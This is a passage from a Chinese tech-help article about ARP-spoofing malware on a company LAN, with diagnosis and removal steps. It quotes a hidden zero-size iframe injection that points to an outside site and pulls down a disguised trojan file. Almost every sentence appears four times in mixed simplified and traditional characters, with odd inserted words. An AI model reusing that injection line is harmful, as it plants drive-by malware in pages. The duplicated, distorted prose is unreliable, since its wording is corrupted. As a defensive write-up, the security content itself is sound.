arp病毒--电脑浏览器中毒后,浏览网页的时候都被嵌套了iframe代码pc软件 文章资讯 手机软件

您当前的位置→图文中心ARP文章ARP经验arp病毒--电脑浏览器中毒后,浏览网页的时候都被嵌套了iframe代码

arp病毒--电脑浏览器中毒后,浏览网页的时候都被嵌套了iframe代码


2008/9/19 17:15:30 编辑:佚名 来源:admin 

我的电脑的浏览器中毒了, 看每个网页, 源代码前面都会被全自动加了一段“<iframesrc='http://www.souxse.cn/arp.htm'width=0height=0>;</ iframe>”这样的代码, 请问是什么问题?

这段iframe的代码指向网站后, 会下载一个s.jpg的文件程序到临时文件程序夹, 这个是什么木马文件程序吗? 这段iframe的代码指向网站后, 会下载一个s.jpg的文件程序到临时文件程序夹, 这个是什么木马文件程序吗? 這段iframe的代碼指向網站後, 會下載一個s.jpg的文件程序到臨時文件程序夾, 這個是什麼木馬文件程序嗎? 这段iframe的代码指向网站后, 会下载一个s.jpg的文件程序到临时文件程序夹, 这个是什么木马文件程序吗?
我已经试过以下杀毒方法:我已經試過以下殺毒方法: 我已经试过以下杀毒方法:我已经试过以下杀毒方法:

1、卡巴斯基--可以能够检测, 选择中阻止, 但杀不了。 1、卡巴斯基--可以能够检测, 选择中阻止, 但杀不了。 1、卡巴斯基--可以能够檢測, 選擇阻止, 但殺不了。 1、卡巴斯基--可以能够检测, 选择中阻止, 但杀不了。
2、瑞星——可以能够检测, 选择中阻止, 但杀不了。 2、瑞星——可以能够检测, 选择中阻止, 但杀不了。 2、瑞星——可以能够檢測, 選擇阻止, 但殺不了。 2、瑞星——可以能够检测, 选择中阻止, 但杀不了。
3、Norton——可以能够检测, 选择中阻止, 但杀不了。 3、Norton——可以能够检测, 选择中阻止, 但杀不了。 3、Norton——可以能够檢測, 選擇阻止, 但殺不了。 3、Norton——可以能够检测, 选择中阻止, 但杀不了。
4、Mcafee——可以能够检测, 选择中阻止, 可以能够删除文件程序。 4、Mcafee——可以能够检测, 选择中阻止, 可以能够删除文件程序。 4、Mcafee——可以能够檢測, 選擇阻止, 可以能够刪除文件程序。 4、Mcafee——可以能够检测, 选择中阻止, 可以能够删除文件程序。 但只要再开一个新的页面, 又会重新下载的。 但只要再开一个新的页面, 又会重新下载的。 但只要再開一個新的頁面, 又會重新下載的。 但只要再开一个新的页面, 又会重新下载的。

最麻烦的是, 这个东西已经就在我公司的局域网里面现在开始蔓延, 已经另外有四台感染, 其中包括98系统system的。 最麻烦的是, 这个东西已经就在我公司的局域网里面现在开始蔓延, 已经另外有四台感染, 其中包括98系统system的。 最麻煩的是, 這個東西已經就在我公司的局域網裡面開始蔓延, 已經另外有四台感染, 其中包括98系統的。 最麻烦的是, 这个东西已经就在我公司的局域网里面现在开始蔓延, 已经另外有四台感染, 其中包括98系统system的。

昨晚下载了黄山ie修复器, 还是有360安全卫士, 把windows的安全漏洞都打上补丁后, 就在安全模式下再用这两个东西全面消除和修复, 现就在已经没问题了, 呵呵。 昨晚下载了黄山ie修复器, 还是有360安全卫士, 把windows的安全漏洞都打上补丁后, 就在安全模式下再用这两个东西全面消除和修复, 现就在已经没问题了, 呵呵。 昨晚下載了黃山ie修復器, 還有360安全衛士, 把windows的安全漏洞都打上補丁後, 就在安全模式下再用這兩個東西全面消除和修復, 現就在已經沒問題了, 呵呵。 昨晚下载了黄山ie修复器, 还是有360安全卫士, 把windows的安全漏洞都打上补丁后, 就在安全模式下再用这两个东西全面消除和修复, 现就在已经没问题了, 呵呵。

就在今天早上现在开始, 公司局域网就很不正常, 频繁断网。 就在今天早上现在开始, 公司局域网就很不正常, 频繁断网。 就在今天早上開始, 公司局域網就很不正常, 頻繁斷網。 就在今天早上现在开始, 公司局域网就很不正常, 频繁断网。

中午休息时打开我的博客, 卡巴立即提示含有木马病毒。 中午休息时打开我的博客, 卡巴立即提示含有木马病毒。 中午休息時打開我的博客, 卡巴立即提示含有木馬病毒。 中午休息时打开我的博客, 卡巴立即提示含有木马病毒。 很纳闷, 难道网站被种木马了? 很纳闷, 难道网站被种木马了? 很納悶, 難道網站被種木馬了? 很纳闷, 难道网站被种木马了? 查看网页源代码, 发现就在顶部有这样一行代码, 本来是被加入了嵌套框架网页, 进而执行此网站上的木马程序。 查看网页源代码, 发现就在顶部有这样一行代码, 本来是被加入了嵌套框架网页, 进而执行此网站上的木马程序。 查看網頁源代碼, 發現就在頂部有這樣一行代碼, 原來是被加入了嵌套框架網頁, 進而執行此網站上的木馬程序。 查看网页源代码, 发现就在顶部有这样一行代码, 本来是被加入了嵌套框架网页, 进而执行此网站上的木马程序。

第一反应就是登陆上FTP, 将文件程序下载下来查看了一遍, 没有发现异常。 第一反应就是登陆上FTP, 将文件程序下载下来查看了一遍, 没有发现异常。 第一反應就是登陸上FTP, 將文件程序下載下來查看了一遍, 沒有發現異常。 第一反应就是登陆上FTP, 将文件程序下载下来查看了一遍, 没有发现异常。 网站文件程序没问题, 应该就是数据信息就在发送send的过程中被篡改了。 网站文件程序没问题, 应该就是数据信息就在发送send的过程中被篡改了。 網站文件程序沒問題, 應該就是數據就在發送的過程中被篡改了。 网站文件程序没问题, 应该就是数据信息就在发送send的过程中被篡改了。 进百度打算搜索, 却发现百度的首页也被加入了, 汗! 进百度打算搜索, 却发现百度的首页也被加入了, 汗! 進百度打算搜索, 卻發現百度的首頁也被加入了, 汗! 进百度打算搜索, 却发现百度的首页也被加入了, 汗! 再开Google, 晕死, 也有! 再开Google, 晕死, 也有! 再開Google, 暈死, 也有! 再开Google, 晕死, 也有! 新浪, 有! 新浪, 有! 新浪, 有! 新浪, 有! 天涯, 有! 天涯, 有! 天涯, 有! 天涯, 有! 将不会这么疯狂吧! 将不会这么疯狂吧! 不會這麼瘋狂吧! 将不会这么疯狂吧! 查找了一些资料, 才知道是ARP欺骗。 查找了一些资料, 才知道是ARP欺骗。 查找了一些資料, 才知道是ARP欺騙。 查找了一些资料, 才知道是ARP欺骗。
去寻找到一些解决处理的方法, 稍微整理了一下。 去寻找到一些解决处理的方法, 稍微整理了一下。 去寻找到一些解決的方法, 稍微整理了一下。 去寻找到一些解决处理的方法, 稍微整理了一下。

一、什么是“ARP欺骗”? 一、什么是“ARP欺骗”? 一、什麼是“ARP欺騙”? 一、什么是“ARP欺骗”?

ARP的意思是Address Resolution Protocol(地址解析协议), 它是一个位于TCP/IP协议栈中的低层协议, 负责将某个IP地址解析成对应的MAC地址。 ARP的意思是AddressResolutionProtocol(地址解析协议), 它是一个位于TCP/IP协议栈中的低层协议, 负责将某个IP地址解析成对应的MAC地址。 ARP的意思是AddressResolutionProtocol(地址解析協議), 它是一個位於TCP/IP協議棧中的低層協議, 負責將某個IP地址解析成對應的MAC地址。 ARP的意思是AddressResolutionProtocol(地址解析协议), 它是一个位于TCP/IP协议栈中的低层协议, 负责将某个IP地址解析成对应的MAC地址。

从反应影响网络net连载通畅的方式来看, ARP欺骗分为二种, 一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。 从反应影响网络net连载通畅的方式来看, ARP欺骗分为二种, 一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。 從影響网絡連接通暢的方式來看, ARP欺騙分為二種, 一種是對路由器ARP表的欺騙;另一種是對內網PC的網關欺騙。 从反应影响网络net连载通畅的方式来看, ARP欺骗分为二种, 一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。

第一种ARP欺骗的原理是——截获网关数据信息。 第一种ARP欺骗的原理是——截获网关数据信息。 第一種ARP欺騙的原理是——截獲網關數據。 第一种ARP欺骗的原理是——截获网关数据信息。 它通知路由器一系列错误的内网MAC地址, 并按照一定的频率会一直不断来进行, 使真实的地址信息再也不能够可以通过更新保存就在路由器中, 结果路由器的所有数据信息只能发送send给错误的MAC地址, 造成正常PC再也不能够收到信息。 它通知路由器一系列错误的内网MAC地址, 并按照一定的频率会一直不断来进行, 使真实的地址信息再也不能够可以通过更新保存就在路由器中, 结果路由器的所有数据信息只能发送send给错误的MAC地址, 造成正常PC再也不能够收到信息。 它通知路由器一系列錯誤的內網MAC地址, 並按照一定的頻率不斷進行, 使真實的地址信息無法通過更新保存就在路由器中, 結果路由器的所有數據只能發送給錯誤的MAC地址, 造成正常PC無法收到信息。 它通知路由器一系列错误的内网MAC地址, 并按照一定的频率会一直不断来进行, 使真实的地址信息再也不能够可以通过更新保存就在路由器中, 结果路由器的所有数据信息只能发送send给错误的MAC地址, 造成正常PC再也不能够收到信息。

第二种ARP欺骗的原理是——伪造网关。 第二种ARP欺骗的原理是——伪造网关。 第二種ARP欺騙的原理是——偽造網關。 第二种ARP欺骗的原理是——伪造网关。 它的原理是建立假网关, 让被它欺骗的PC向假网关发数据信息, 而不是可以通过正常的路由器途径上网。 它的原理是建立假网关, 让被它欺骗的PC向假网关发数据信息, 而不是可以通过正常的路由器途径上网。 它的原理是建立假網關, 讓被它欺騙的PC向假網關發數據, 而不是通過正常的路由器途徑上網。 它的原理是建立假网关, 让被它欺骗的PC向假网关发数据信息, 而不是可以通过正常的路由器途径上网。 就在PC看来, 就是上不了网了, “网络net掉线了”。 就在PC看来, 就是上不了网了, “网络net掉线了”。 就在PC看來, 就是上不了網了, “网絡掉線了”。 就在PC看来, 就是上不了网了, “网络net掉线了”。 ARP欺骗木马只需成功感染一台电脑, 就有可能导致整个局域网都再也不能够上网, 严重的甚至有可能带来整个网络net的瘫痪。 ARP欺骗木马只需成功感染一台电脑, 就有可能导致整个局域网都再也不能够上网, 严重的甚至有可能带来整个网络net的瘫痪。 ARP欺騙木馬只需成功感染一台電腦, 就有可能導致整個局域網都無法上網, 嚴重的甚至有可能帶來整個网絡的癱瘓。 ARP欺骗木马只需成功感染一台电脑, 就有可能导致整个局域网都再也不能够上网, 严重的甚至有可能带来整个网络net的瘫痪。

这一次是公司局域网中某台电脑中了木马, 造成局域网内的ARP欺骗, 使得浏览网页时会全自动就在页面顶部加入 iframe 代码。 这一次是公司局域网中某台电脑中了木马, 造成局域网内的ARP欺骗, 使得浏览网页时会全自动就在页面顶部加入iframe代码。 這次是公司局域網中某台電腦中了木馬, 造成局域網內的ARP欺騙, 使得瀏覽網頁時會自動就在頁面頂部加入iframe代碼。 这一次是公司局域网中某台电脑中了木马, 造成局域网内的ARP欺骗, 使得浏览网页时会全自动就在页面顶部加入iframe代码。

二、故障现象及原因分析二、故障現象及原因分析 二、故障现象及原因分析二、故障现象及原因分析

情况一、当局域网内某台主机感染了ARP病毒时, 会向本局域网内(指某一网段, 比如10.15.3.0这一段)所有主机发送sendARP欺骗攻击, 让原本流向网络net中心的流量改道流向病毒主机, 并可以通过病毒主机代理上网。 情况一、当局域网内某台主机感染了ARP病毒时, 会向本局域网内(指某一网段, 比如10.15.3.0这一段)所有主机发送sendARP欺骗攻击, 让原本流向网络net中心的流量改道流向病毒主机, 并可以通过病毒主机代理上网。 情況一、當局域網內某台主機感染了ARP病毒時, 會向本局域網內(指某一網段, 比如10.15.3.0這一段)所有主機發送ARP欺騙攻擊, 讓原本流向网絡中心的流量改道流向病毒主機, 並通過病毒主機代理上網。 情况一、当局域网内某台主机感染了ARP病毒时, 会向本局域网内(指某一网段, 比如10.15.3.0这一段)所有主机发送sendARP欺骗攻击, 让原本流向网络net中心的流量改道流向病毒主机, 并可以通过病毒主机代理上网。 因客户端具有防代理功能, 造成受害者再也不能够可以通过病毒主机上网。 因客户端具有防代理功能, 造成受害者再也不能够可以通过病毒主机上网。 因客戶端具有防代理功能, 造成受害者無法通過病毒主機上網。 因客户端具有防代理功能, 造成受害者再也不能够可以通过病毒主机上网。

由于病毒发作时发出大量数据信息包会将网络net拥塞, 大家会感觉上网速度越来越慢。 由于病毒发作时发出大量数据信息包会将网络net拥塞, 大家会感觉上网速度越来越慢。 由於病毒發作時發出大量數據包會將网絡擁塞, 大家會感覺上網速度越來越慢。 由于病毒发作时发出大量数据信息包会将网络net拥塞, 大家会感觉上网速度越来越慢。 中毒者同样如此, 受其自身处理能力的限制, 感觉运行速度很慢时, 有可能会采取重新启动或其他措施。 中毒者同样如此, 受其自身处理能力的限制, 感觉运行速度很慢时, 有可能会采取重新启动或其他措施。 中毒者同樣如此, 受其自身處理能力的限制, 感覺運行速度很慢時, 有可能會採取重新啟動或其他措施。 中毒者同样如此, 受其自身处理能力的限制, 感觉运行速度很慢时, 有可能会采取重新启动或其他措施。 此时病毒短时间停止stop工作, 大家会感到网络net恢复正常。 此时病毒短时间停止stop工作, 大家会感到网络net恢复正常。 此時病毒短時間停止stop工作, 大家會感到网絡恢復正常。 此时病毒短时间停止stop工作, 大家会感到网络net恢复正常。 如此反复, 就造成网络net时断时续。 如此反复, 就造成网络net时断时续。 如此反覆, 就造成网絡時斷時續。 如此反覆, 就造成网络net时断时续。

情况二、局域网内有某些用户使用了ARP欺骗程序(如:网络net执法官、网络net剪刀手、传奇木马、QQ盗号软件等)发送sendARP欺骗数据信息包, 致使被攻击的电脑出现突然不能够上网, 过一段时间又能上网, 反复掉线的现象。 情况二、局域网内有某些用户使用了ARP欺骗程序(如:网络net执法官、网络net剪刀手、传奇木马、QQ盗号软件等)发送sendARP欺骗数据信息包, 致使被攻击的电脑出现突然不能够上网, 过一段时间又能上网, 反复掉线的现象。 情況二、局域網內有某些用戶使用了ARP欺騙程序(如:网絡執法官、网絡剪刀手、傳奇木馬、QQ盜號軟件等)發送ARP欺騙數據包, 致使被攻擊的電腦出現突然不能够上網, 過一段時間又能上網, 反覆掉線的現象。 情况二、局域网内有某些用户使用了ARP欺骗程序(如:网络net执法官、网络net剪刀手、传奇木马、QQ盗号软件等)发送sendARP欺骗数据信息包, 致使被攻击的电脑出现突然不能够上网, 过一段时间又能上网, 反覆掉线的现象。

三、故障诊断三、故障診斷 三、故障诊断三、故障诊断

如果发现上面疑似情况, 可以能够可以通过如下操作来进行诊断:用鼠标点击”现在开始”按钮按键->选择中”运行”->输入”arp -d”->用鼠标点击”确定”按钮按键, 之后重新尝试上网, 如果能恢复正常, 则说明此次掉线有可能是受ARP欺骗所致。 如果发现上面疑似情况, 可以能够可以通过如下操作来进行诊断:用鼠标点击”现在开始”按钮按键->选择中”运行”->输入”arp-d”->用鼠标点击”确定”按钮按键, 之后重新尝试上网, 如果能恢复正常, 则说明此次掉线有可能是受ARP欺骗所致。 如果發現上面疑似情況, 可以能够通過如下操作進行診斷:點擊”開始”按鈕->選擇”運行”->輸入”arp-d”->點擊”確定”按鈕, 然後重新嘗試上網, 如果能恢復正常, 則說明此次掉線有可能是受ARP欺騙所致。 如果发现上面疑似情况, 可以能够可以通过如下操作来进行诊断:用鼠标点击”现在开始”按钮按键->选择中”运行”->输入”arp-d”->用鼠标点击”确定”按钮按键, 之后重新尝试上网, 如果能恢复正常, 则说明此次掉线有可能是受ARP欺骗所致。 注:”arp -d”命令用于消除并重建本机arp表。 注:”arp-d”命令用于消除并重建本机arp表。 注:”arp-d”命令用於消除並重建本機arp表。 注:”arp-d”命令用于消除并重建本机arp表。 ”arp -d”命令并不能够抵御ARP欺骗, 执行后仍有有可能再次遭受ARP攻击。 ”arp-d”命令并不能够抵御ARP欺骗, 执行后仍有有可能再次遭受ARP攻击。 ”arp-d”命令並不能够抵禦ARP欺騙, 執行後仍有有可能再次遭受ARP攻擊。 ”arp-d”命令并不能够抵御ARP欺骗, 执行后仍有有可能再次遭受ARP攻击。

四、故障处理四、故障處理 四、故障处理四、故障处理

1、中毒者:使用趋势科技ARP病毒专杀必备工具查杀病毒(已提供下载) 1、中毒者:使用趨勢科技ARP病毒專殺必备工具查殺病毒(已提供下載) 1、中毒者:使用趋势科技ARP病毒专杀必备工具查杀病毒(已提供下载) 1、中毒者:使用趋势科技ARP病毒专杀必备工具查杀病毒(已提供下载)

下载后解压缩, 运行包内TSC.exe文件程序, 一定不要关让它会一直不断运行完, 最后查看report文档便知是否中毒。 下载后解压缩, 运行包内TSC.exe文件程序, 一定不要关让它会一直不断运行完, 最后查看report文档便知是否中毒。 下載後解壓縮, 運行包內TSC.exe文件程序, 一定不要關讓它会一直不断運行完, 最後查看report文檔便知是否中毒。 下载后解压缩, 运行包内TSC.exe文件程序, 一定不要关让它会一直不断运行完, 最后查看report文档便知是否中毒。

2、被害者:使用AntiArp软件抵御ARP攻击(已提供下载) 2、被害者:使用AntiArp軟件抵禦ARP攻擊(已提供下載) 2、被害者:使用AntiArp软件抵御ARP攻击(已提供下载) 2、被害者:使用AntiArp软件抵御ARP攻击(已提供下载)

运行AntiArp。 运行AntiArp。 運行AntiArp。 运行AntiArp。 输入本网段的网关ip地址后, 用鼠标点击”获取网关MAC地址”, 检查网关IP地址和MAC地址无误后, 用鼠标点击”全自动保护”。 输入本网段的网关ip地址后, 用鼠标点击”获取网关MAC地址”, 检查网关IP地址和MAC地址无误后, 用鼠标点击”全自动保护”。 輸入本網段的網關ip地址後, 點擊”獲取網關MAC地址”, 檢查網關IP地址和MAC地址無誤後, 點擊”自動保護”。 输入本网段的网关ip地址后, 用鼠标点击”获取网关MAC地址”, 检查网关IP地址和MAC地址无误后, 用鼠标点击”全自动保护”。 若不知道网关IP地址, 可可以通过以下操作获取:用鼠标点击”现在开始”按钮按键->选择中”运行”->输入”cmd”用鼠标点击”确定”->输入”ipconfig”按回车, ”Default Gateway”后的IP地址就是网关地址。 若不知道网关IP地址, 可可以通过以下操作获取:用鼠标点击”现在开始”按钮按键->选择中”运行”->输入”cmd”用鼠标点击”确定”->输入”ipconfig”按回车, ”DefaultGateway”后的IP地址就是网关地址。 若不知道網關IP地址, 可通過以下操作獲取:點擊”開始”按鈕->選擇”運行”->輸入”cmd”點擊”確定”->輸入”ipconfig”按回車, ”DefaultGateway”後的IP地址就是網關地址。 若不知道网关IP地址, 可可以通过以下操作获取:用鼠标点击”现在开始”按钮按键->选择中”运行”->输入”cmd”用鼠标点击”确定”->输入”ipconfig”按回车, ”DefaultGateway”后的IP地址就是网关地址。 AntiArp软件会就在提示框内出现病毒主机的MAC地址。 AntiArp软件会就在提示框内出现病毒主机的MAC地址。 AntiArp軟件會就在提示框內出現病毒主機的MAC地址。 AntiArp软件会就在提示框内出现病毒主机的MAC地址。

这一次算是领教了ARP, 呵呵。 这一次算是领教了ARP, 呵呵。 這次算是領教了ARP, 呵呵。 这一次算是领教了ARP, 呵呵。

相关文章
  • aRP的工作原理及高速缓存
  • 基于ARP欺骗的惩罚措施
  • ARP协议的探测原理
  • A Sharper Scaling图片放大不失真软件使用方法
  • 支付宝AR识花是什么,支付宝AR识花玩法介绍
  • 三星I9100连上电脑的Kies,提示"Your device's current firmware version is not supp...
  • flipboard怎么注册 Flipboard注册方法
  • VMware安装CentOS图文教程
  • 发表评论
    阅读排行
    网站帮助 - 广告合作 - 下载声明 - 网站地图